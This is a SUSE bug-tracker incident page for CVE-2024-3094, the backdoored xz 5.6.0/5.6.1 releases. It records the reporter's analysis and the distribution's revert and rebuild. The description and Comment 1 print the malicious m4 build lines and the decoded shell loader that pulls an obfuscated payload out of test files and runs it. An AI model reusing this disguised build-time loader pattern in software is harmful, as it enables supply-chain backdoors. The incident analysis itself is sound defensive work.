Bug 1222124 (CVE-2024-3094) - VUL-0: CVE-2024-3094: xz: backdoored 5.6.0,5.6.1 version
Summary: VUL-0: CVE-2024-3094: xz: backdoored 5.6.0,5.6.1 version
Status: NEW
Alias: CVE-2024-3094
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/399441/
Whiteboard:
Keywords:
Depends on: 1222448
Blocks:
  Show dependency treegraph
 
Reported: 2024-03-28 11:46 UTC by Marcus Meissner
Modified: 2024-04-19 09:09 UTC (History)
12 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Marcus Meissner 2024-03-28 11:46:09 UTC 
the 5.6.1 version of xz is backdoored

m4/build-to-host.m4
calls 

  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`

and this:

    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
Comment 1 Marcus Meissner 2024-03-28 12:17:23 UTC 
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/
finds
tests/files/bad-3-corrupt_lzma2.xz
cat tests/files/bad-3-corrupt_lzma2.xz|tr "\t \-_" " \t_\-" >xx
xz -c -d <xx >yy


yy is:
####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####
Comment 2 Marcus Meissner 2024-03-28 12:44:20 UTC 
I informed distros list.

I reverted Base:System xz to 5.4.3 and submitted to Fatory.
Comment 5 Marcus Meissner 2024-03-28 19:02:53 UTC 
CRD: 2024-05-13 

in vince.

i doubt it will hold.
Comment 7 Dirk Mueller 2024-03-28 22:08:18 UTC 
I can confirm that the described timing behavior difference is observable with the described method on openSUSE Tumbleweed from yesterday. I can confirm it's gone with todays snapshot.
Comment 8 Marcus Meissner 2024-04-02 11:14:03 UTC 
Status update:

We reverted xz in Base:System and openSUSE:Factory on March 28th.

Factory got a fixed ftp tree done by the buildops and factory devs.

A full factory bootstrap was triggered from a base built without a compromised xz.

news.opensuse.org post was published. https://news.opensuse.org/2024/03/29/xz-backdoor/